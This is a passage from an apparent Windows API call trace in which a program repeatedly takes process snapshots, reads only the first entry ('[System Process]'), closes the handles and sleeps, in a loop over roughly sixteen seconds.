lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) 
returned 1 [0137.722] CloseHandle (hObject=0xc4) returned 1 [0137.722] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0137.727] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0137.812] CloseHandle (hObject=0xbc) returned 1 [0137.814] Sleep (dwMilliseconds=0x12c) [0138.171] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.177] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.238] CloseHandle (hObject=0xc4) returned 1 [0138.239] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0138.245] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.363] CloseHandle (hObject=0xbc) returned 1 [0138.363] Sleep (dwMilliseconds=0x12c) [0138.674] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0138.682] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.728] CloseHandle (hObject=0xc4) returned 1 [0138.728] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0138.733] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, 
cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0138.774] CloseHandle (hObject=0xbc) returned 1 [0138.774] Sleep (dwMilliseconds=0x12c) [0139.111] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0139.118] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.197] CloseHandle (hObject=0xc4) returned 1 [0139.197] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.204] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.251] CloseHandle (hObject=0xbc) returned 1 [0139.251] Sleep (dwMilliseconds=0x12c) [0139.613] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0139.620] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.716] CloseHandle (hObject=0xc4) returned 1 [0139.716] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0139.721] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0139.838] CloseHandle (hObject=0xbc) returned 1 [0139.838] 
Sleep (dwMilliseconds=0x12c) [0140.774] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0140.780] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.116] CloseHandle (hObject=0xc4) returned 1 [0141.117] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0141.124] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0141.230] CloseHandle (hObject=0xbc) returned 1 [0141.230] Sleep (dwMilliseconds=0x12c) [0142.135] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0142.141] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.368] CloseHandle (hObject=0xc4) returned 1 [0142.368] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0142.373] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.547] CloseHandle (hObject=0xbc) returned 1 [0142.547] Sleep (dwMilliseconds=0x12c) [0142.879] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0142.883] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0142.973] CloseHandle (hObject=0xc4) returned 1 [0142.973] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0142.978] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.111] CloseHandle (hObject=0xbc) returned 1 [0143.111] Sleep (dwMilliseconds=0x12c) [0143.431] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0143.436] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.490] CloseHandle (hObject=0xc4) returned 1 [0143.490] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0143.495] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0143.834] CloseHandle (hObject=0xbc) returned 1 [0143.835] Sleep (dwMilliseconds=0x12c) [0144.198] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0144.204] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.293] CloseHandle (hObject=0xc4) returned 1 [0144.293] CreateToolhelp32Snapshot 
(dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.297] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.358] CloseHandle (hObject=0xbc) returned 1 [0144.358] Sleep (dwMilliseconds=0x12c) [0144.676] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0144.681] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.721] CloseHandle (hObject=0xc4) returned 1 [0144.721] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0144.726] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0144.770] CloseHandle (hObject=0xbc) returned 1 [0144.770] Sleep (dwMilliseconds=0x12c) [0145.110] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.116] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.206] CloseHandle (hObject=0xc4) returned 1 [0145.206] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.211] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.298] CloseHandle (hObject=0xbc) returned 1 [0145.299] Sleep (dwMilliseconds=0x12c) [0145.644] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0145.650] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.749] CloseHandle (hObject=0xc4) returned 1 [0145.749] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0145.754] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0145.810] CloseHandle (hObject=0xbc) returned 1 [0145.810] Sleep (dwMilliseconds=0x12c) [0146.299] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0146.306] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.456] CloseHandle (hObject=0xc4) returned 1 [0146.456] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0146.461] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.583] CloseHandle (hObject=0xbc) returned 1 [0146.583] Sleep (dwMilliseconds=0x12c) [0146.887] CreateToolhelp32Snapshot (dwFlags=0xf, 
th32ProcessID=0x0) returned 0xc4 [0146.893] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.989] CloseHandle (hObject=0xc4) returned 1 [0146.989] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0146.995] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.085] CloseHandle (hObject=0xbc) returned 1 [0147.086] Sleep (dwMilliseconds=0x12c) [0147.443] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0147.449] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.543] CloseHandle (hObject=0xc4) returned 1 [0147.543] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0147.549] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0147.672] CloseHandle (hObject=0xbc) returned 1 [0147.672] Sleep (dwMilliseconds=0x12c) [0148.001] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.007] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, 
pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.123] CloseHandle (hObject=0xc4) returned 1 [0148.123] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.129] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.321] CloseHandle (hObject=0xbc) returned 1 [0148.321] Sleep (dwMilliseconds=0x12c) [0148.643] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.649] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.746] CloseHandle (hObject=0xc4) returned 1 [0148.746] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.753] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.842] CloseHandle (hObject=0xbc) returned 1 [0148.843] Sleep (dwMilliseconds=0x12c) [0149.147] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.152] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.190] CloseHandle (hObject=0xc4) returned 1 [0149.190] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.258] Process32FirstW (in: 
hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.296] CloseHandle (hObject=0xbc) returned 1 [0149.296] Sleep (dwMilliseconds=0x12c) [0149.611] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0149.617] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.685] CloseHandle (hObject=0xc4) returned 1 [0149.685] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0149.689] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0149.809] CloseHandle (hObject=0xbc) returned 1 [0149.810] Sleep (dwMilliseconds=0x12c) [0150.113] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.118] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.156] CloseHandle (hObject=0xc4) returned 1 [0150.156] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0150.170] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) 
returned 1 [0150.223] CloseHandle (hObject=0xbc) returned 1 [0150.223] Sleep (dwMilliseconds=0x12c) [0150.548] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0150.553] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.616] CloseHandle (hObject=0xc4) returned 1 [0150.616] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0150.623] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0150.687] CloseHandle (hObject=0xbc) returned 1 [0150.687] Sleep (dwMilliseconds=0x12c) [0151.033] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0151.040] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.147] CloseHandle (hObject=0xc4) returned 1 [0151.147] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.152] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.223] CloseHandle (hObject=0xbc) returned 1 [0151.223] Sleep (dwMilliseconds=0x12c) [0151.582] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0151.591] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | 
out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.693] CloseHandle (hObject=0xc4) returned 1 [0151.694] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0151.700] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.834] CloseHandle (hObject=0xbc) returned 1 [0151.834] Sleep (dwMilliseconds=0x12c) [0152.211] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.217] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.345] CloseHandle (hObject=0xc4) returned 1 [0152.346] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.350] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.445] CloseHandle (hObject=0xbc) returned 1 [0152.445] Sleep (dwMilliseconds=0x12c) [0152.749] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0152.755] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.792] CloseHandle 
(hObject=0xc4) returned 1 [0152.792] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0152.834] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.964] CloseHandle (hObject=0xbc) returned 1 [0152.964] Sleep (dwMilliseconds=0x12c) [0153.266] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.271] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.334] CloseHandle (hObject=0xc4) returned 1 [0153.334] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0153.340] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.449] CloseHandle (hObject=0xbc) returned 1 [0153.449] Sleep (dwMilliseconds=0x12c) [0153.747] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0153.762] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0153.806] CloseHandle (hObject=0xc4) returned 1 [0153.806] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0153.812] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, 
